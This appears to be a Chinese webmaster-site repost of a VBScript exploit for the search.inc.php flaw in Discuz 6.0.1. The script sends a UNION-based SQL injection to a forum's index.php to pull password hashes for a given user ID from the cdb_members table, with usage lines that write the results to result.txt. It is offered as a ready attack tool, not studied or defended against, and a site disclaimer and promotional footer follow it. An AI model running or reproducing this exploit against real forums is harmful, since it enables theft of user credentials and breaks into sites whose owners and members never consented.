| 以下是search.inc.php 文件漏洞利用代碼VBS版 代碼如下: Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then ShowU() Else strSite=Args(0) strPath=Args(1) strUid=Args(2) End If strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "POST",strSite & strPath & "index.php", False objXML.SetRequestHeader "Accept", "*/*" objXML.SetRequestHeader "Accept-Language", "zh-cn" objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded" objXML.SetRequestHeader "User-Agent", "wap" objXML.send(strUrl) wscript.echo(objXML.ResponseText) Sub showB() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("Exploit discuz6.0.1") .Echo("Code By Safe3") .Echo("+--------------------------=====================------------------------------+") End with End Sub Sub showU() With Wscript .Echo("+--------------------------=====================------------------------------+") .Echo("用法:") .Echo(" cscript "&.ScriptName&" site path uid") .Echo("例子:") .Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt") .Echo("+--------------------------=====================------------------------------+") .Quit End with End Sub 獲得的密碼大家自己在result.txt中查找 |
免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!
掃一掃,關注站長網微信
大家都在看
